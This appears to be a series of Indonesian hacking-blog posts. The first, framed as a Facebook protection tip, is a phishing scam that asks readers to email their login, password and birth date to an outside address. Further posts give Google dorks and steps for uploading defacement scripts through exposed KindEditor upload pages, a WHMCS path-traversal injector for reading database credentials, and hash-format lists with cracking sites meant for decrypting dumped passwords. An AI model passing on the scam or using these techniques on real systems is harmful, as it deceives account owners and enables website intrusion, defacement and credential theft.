Caranya hanya memakai fitur SSL.ROADBLOCK yang ada di facebook, dengan fitur ini anda bisa aman dari hacker karena jika ada seseorang yang mengetahui password facebook anda tidak usah khawatir karena ssl.roadblock akan mencegahnya untuk mengakses ke akun milik anda.
sistemnya SSL ini mengenali pemilik via IP mobile, IP komputer yang biasa dipakai, IP mobile dan IP komputer diketahui saat pendaftaran SSL ROADBLOCK.
contoh Preview SSL ROADBLOCK

masuk seperti biasa ke account facebook.
- lalu masuk ke MESSAGE kemudian pilih NEW MESSAGE / KIRIM PESAN BARU
- ketik isian kepada :  ssl.roadblock@programmer.net
- ketik isian judul : SSL ROADBLOCK
- ketik isian Pesan :
* Full name :
* Login email and password :
Any additional information or questions for roadblock security
* Date of birth (month/day/year) :
kemudian kiik  kirim/send

contoh isi pesan :
* Full name : yanti asmara
* Login email and password: yanti85@yahoo.com pasword:cinta
Any additional information or questions for roadblock security: Date of birth (month/day/year): September/15/1985
Akhirnya selesai deh, coba logout dan login kembali untuk melihat hasil previewnya.
Dan jika ada orang lain yang membuka facebook anda dari jarak jauh orang itu akan terhenti di SSL ROADBLOCK yang akan membingungkan orang itu, dia akan disuguhi beberapa pertanyaan.
ini contoh gambarnya:

Jadi hanya kamu yang bisa masuk ke login account facebook anda sendiri
note:  SSL.ROADBLOCK akan aktif 5 hari setelah pendaftaran dan jika orang lain yang akan berusaha masuk ke facebook anda di luar tempat daerah anda suka membuka akun facebook.
Tips untuk menjaga keamanan facebook kamu
  1. Jangan hanya memiliki satu email account untuk dapat mengakses account facebook anda, tambahkan email kedua pada halaman account privasi facebook anda.
  2. Gunakan password yang berbeda dengan account mail anda. contoh:password email anda KEREN, password facebook anda NOTCOOL
  3. Buatlah pertanyaan pengamanan yang ketat jawabannya g nyambung tapi jawabannya bisa anda ingat. (pikirkanlah)
  4. Jika anda suka buka facebook di warnet, setiap anda masuk untuk login di facebook gunakanlah keyboard screen untuk mengisi email n passwordnya biar aman meskipun agak ribet.caranya: klik START dan pilih RUN dan ketikan OSK maka akan muncul keyboard digital
  5. Jika facebook kena hack orang, telitilah dengan account mail anda. jika dia menghack dan mengganti alamat email facebook anda dengan alamat lain. maka masuklah ke account mail anda yang bersangkutan.dan lihatlah apakah ada pesan masuk dari facebook yang isinya pemberitahuan pengubahan email account facebook, kalau ada, anda bisa cancel dengan mengklik url pengcancelannya. jadi FB anda bisa direbut kembali.
  6. Jangan gunakan tangal lahir sebagai password atau nomor hp cz seorang hacker yang ahli dibidang social engineering bakal dengan gampangnya mengcrack akun anda.
More aboutCara Amankan Fb anda dari seorang Hacker

deface ala pemua ^_^

Diposting oleh Unknown

Selamat Malam =)) POST pertmax Om Jin Neh -=)) hasil Copas wkkwwk =)))
 OK Langsung -_-'
1. Siapkan script mpepes kalian [sudah]
2. ngeDORK di google
-inurl:examples/uploadbutton.html
-inurl:kindeditor
3. Target sudah siap?
4. Klik Upload dan pilih script mpepes kalian (.html. Tapi ga ada salahnya nyoba .php, kalo orang jawa bilang "bejo bejan")
5. Setelah pilih file otomatis akan Upload dengan sendirinya, dan akan muncul tulisan seperti ini :
/rte/attached/file/20120605/20120605234806_23104.html
6. Copy aja tulisannya dan langsung paste di URL dimana tempat ente upload script tersebut.
example :
http://www.daitianyi.net/rte/examples/uploadbutton.html
Ane upload script keluar ginian : /rte/attached/file/20120605/20120605234806_23104.html
langsung replace aja jadi kayak gini : http://www.daitianyi.net/rte/attached/file/20120605/20120605234806_23104.html
Semoga membantu =))
kalau mau dork yang lebih ampuh coba make ini beb : inurl:uploadbutton.html
Lumayan buat nambahin archive di Indeves :v
More aboutdeface ala pemua ^_^

Macam2x bentuk HASH

Diposting oleh Unknown

yg sudah pada tahu lewati aja dah ..

Macam-macam Bentuk Hash

1. DES(Unix)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 13 Karakter.
[+] Deskripsi : Dua karakter pertama adalah salt (Karakter acak, di contoh kita saltnya adalah string "Iv.") kemudian diikuti oleh Hashnya.
[+] Contoh : IvS7aeT4NzQPM

__________________________________________________________________________

2. Domain Cached Credentials
[+] Digunakan untuk mencache password-password domain windows.
[+] Panjang : 16 bytes (32 Karakter)
[+] Algorithm : MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
[+] Contoh : Admin:b474d48cdfc4974d86ef4d24904cdd91

 __________________________________________________________________________

3. MD5(Unix)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 34 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $1$ kemudian dilanjutkan dengan salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678") kemudian dilanjutkan dengan satu karakter lagi $ , kemudian diikuti oleh Hashnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.
[+] Contoh : $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
 __________________________________________________________________________

4. MD5(APR)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 37 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $apr1$ , kemudian dilanjutkan dengan salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $ , kemudian diikuti oleh Hashnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.
[+] Contoh : $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.

 __________________________________________________________________________

5. MD5(phpBB3)
[+] Digunakan di phpBB 3.x.x.
[+] Panjang : 37 Karakter.
[+] Dekripsi : Hash dimulai dengan tanda $H$ kemudian diikuti dengan satu karakter (paling sering angka "9") kemudian diikuti dengan salt (8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian diikuti oleh Hashnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2048 kali.
[+] Contoh : $H$9123456785DAERgALpsri.D9z3ht120

 __________________________________________________________________________

6. MD5(Wordpress)
[+] Digunakan di Wordpress.
[+] Panjang : 34 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $P$ , kemudian diikuti dengan satu karakter (Paling sering huruf "B"), kemudian diikuti dengan salt (8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian diikuti oleh Hashnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 8192 kali.
[+] Contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

 __________________________________________________________________________

7. MySQL
[+] Digunakan di MySQL versi lama.
[+] Panjang : 8 bytes.
[+] Deskripsi : Hash yang terdiri dari dua DWORD, masing-masing tidak melebihi nilai 0x7fffffff.
[+] Contoh : 606717496665bcba

 __________________________________________________________________________

8. MySQL5
[+] Digunakan di MySQL Versi baru.
[+] Panjang : 20 bytes.
[+] Algorithm : SHA-1(SHA-1($pass))
[+] Contoh : *E6CC90B878B948C35E92B003C792C46C58C4AF40
[+] Catatan : Hash harus dimuat ke program tanpa tanda bintang (*) yang terdapat di awal setiap hash.

 __________________________________________________________________________

9. RAdmin v2.x
[+] Digunakan di Aplikasi Remote Administrator v2.x.
[+] Panjang : 16 bytes.
[+] Algorithm : Password diisi dengan nol dengan panjang 100 bytes, kemudian seluruh string dihash dengan algoritma MD5.
[+] Contoh : 5e32cceaafed5cc80866737dfb212d7f

 __________________________________________________________________________

10. MD5
[+] Digunakan di phpBB v2.x, Joomla versi di bawah 1.0.13 dan banyak forum dan CMS.
[+] Panjang : 16 bytes.
[+] Algorithm : sama seperti fungsi md5() di php.
[+] Contoh : c4ca4238a0b923820dcc509a6f75849b

 __________________________________________________________________________

11. md5($pass.$salt)
[+] Digunakan di WB News, Joomla Versi 1.0.13 keatas.
[+] Panjang : 16 bytes
[+] contoh : 6f04f0d75f6870858bae14ac0b6d9f73:1234

 __________________________________________________________________________

12. md5($salt.$pass)
[+] Digunakan di osCommerce, AEF, Gallery dan beberapa CMS.
[+] Panjang : 16 bytes.
[+] Contoh : f190ce9ac8445d249747cab7be43f7d5:12

 __________________________________________________________________________

13. md5(md5($pass))
[+] Digunakan di e107, DLE, AVE, Diferior, Koobi dan beberapa CMS.
[+] Panjang : 16 bytes.
[+] Contoh : 28c8edde3d61a0411511d3b1866f0636

 __________________________________________________________________________

14. md5(md5($pass).$salt)
[+] Digunakan di vBulletin, IceBB.
[+] Panjang ; 16 bytes.
[+] Contoh : 6011527690eddca23580955c216b1fd2:wQ6

 __________________________________________________________________________

15. md5(md5($salt).md5($pass))
[+] Digunakan di IPB.
[+] Panjang : 16 bytes.
[+] Contoh : 81f87275dd805aa018df8befe09fe9f8:wH6_S

 __________________________________________________________________________

16. md5(md5($salt).$pass)
[+] Digunakan di MyBB.
[+] Panjang : 16 bytes.
[+] Contoh : 816a14db44578f516cbaef25bd8d8296:1234

 __________________________________________________________________________

17. md5($salt.$pass.$salt)
[+] Digunakan di TBDev.
[+] Panjang : 16 bytes.
[+] Contoh : a3bc9e11fddf4fef4deea11e33668eab:1234

__________________________________________________________________________

18. md5($salt.md5($salt.$pass))
[+] Digunakan di DLP.
[+] Panjang : 16 bytes.
[+] Contoh : 1d715e52285e5a6b546e442792652c8a:1234

__________________________________________________________________________

20. SHA-1
[+] Digunakan dibanyak Forum dan CMS.
[+] Panjang : 20 bytes
[+] Algorithm: Sama dengan sha1() fungsi di PHP.
[+] Contoh : 356a192b7913b04c54574d18c28d46e6395428ab

__________________________________________________________________________

21. sha1(strtolower($username).$pass)
[+] Digunakan di SMF
[+] Panjang : 20 bytes.
[+] Contoh : Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a

__________________________________________________________________________

22. sha1($salt.sha1($salt.sha1($pass)))
[+] Digunakan di Woltlab BB
[+] Panjang : 20 bytes
[+] Contoh : cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234

__________________________________________________________________________

23. SHA-256(Unix)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 55 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $5$, kemudian diikuti salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-256 5000 kali.
[+] Contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi...

__________________________________________________________________________

24. SHA-512(Unix)
[+] Digunakan di Linux dan sejenisnya.
[+] Panjang : 98 Karakter.
[+] Deskripsi : Hash dimulai dengan tanda $6$, kemudian diikuti dengan salt (sampai dengan 8 karakter acak, dicontoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.
[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-512 5000 kali.

[+] contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm...


thx to : surabayahacker

-sandy the aqworld
More aboutMacam2x bentuk HASH

Hacking WHMCS

Diposting oleh Unknown

Exploit Powered by whmcs

#Keyword Dork :
1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=

 #Injector :
cart.php?a=test&templatefile=../../../configuration.php


#Contoh [sudah di patch/fix] :
http://www.7m2.net/whmcs/cart.php?


#Tambain Injector di belakang cart.php? sampe jdi :


http://target.com/whmcs/cart.php?a=test&templatefile=../../../configuration.php
#truz klik kanan > View page source

ntar muncul ...
$db
$license
$host
$user
$pass

bgtulah :v, tinggal login di
www.target.com/phpmyadmin

xixixixixiiii.... :3
More aboutHacking WHMCS

Macam-macam Tipe Hash

Diposting oleh Unknown on Kamis, 19 Juli 2012

 assalamualaikum
bntr lagi mau ramadhan nih :D


bagi yang dah ahli sqli pasti pernah punya masalah tentang tipe hash yang telah di temukan,
maka dari itu kenalilah tipe" hash yang telah anda temukan untuk mempermudah proses decrypt,,
Langsung aja

CEKIDOT

1.MD5(Message-Digest algortihm 5)
=> MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996 (wikipedia)
- digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
- panjangnya 16 bytes (32 karakter)
- contoh : c4ca4238a0b923820dcc509a6f75849b

2.MD5($pass.$salt)
=> digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
- contoh : 6f04f0d75f6870858bae14ac0b6d9f73

3.MD5($salt.$pass)
=> digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
- contoh : f190ce9ac8445d249747cab7be43f7d

4.md5(md5($pass).$salt)
=> digunakan di vBulletin, IceBB dan cms lainnya
- panjang 16 bytes (32 karakter)
- contoh : 6011527690eddca23580955c216b1fd2

5.MD5(Wordpress)
=> digunakan di wordpress
- panjangnya 17 bytes (34 karakter)
- hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah huruf "B") kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah "12345678") lalu dilanjutkan oleh hashnya
- contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

6.MD5(phpBB3)
=> digunakan di CMS phpBB 3.x.x
- panjangnya 17 bytes (34 karakter)
- hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor "9"), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") kemudian dilanjutkan oleh hashnya
- contoh : $H$9123456785DAERgALpsri.D9z3ht120

7.SHA-1(Secure Hash Algorithm)
=> diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard
digunakan oleh beberapa CMS dan beberapa forum
- panjangnya 20 bytes (40 karakter)
- contoh : 356a192b7913b04c54574d18c28d46e6395428ab

8.SHA-256(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") lalu dilanjutkan oleh karakter "$" kemudian dilanjutkan oleh hashnya
- panjang 55 karakter
- contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi...

9.SHA-512(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") lalu dilanjutkan oleh karakter "$" kemudian dilanjutkan oleh hashnya
- panjang 98 karakter
- contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm...

10.Base64
=> algoritma yg berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan "="
- digunakan di beberapa forum dan CMS
- contoh : Y3liZXJfY3JpbWluYWw=

situs untuk mengcrack hash :
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
dan masih banyak lagi yang lain,,,

-sandy the aqworld

salam battleon
More aboutMacam-macam Tipe Hash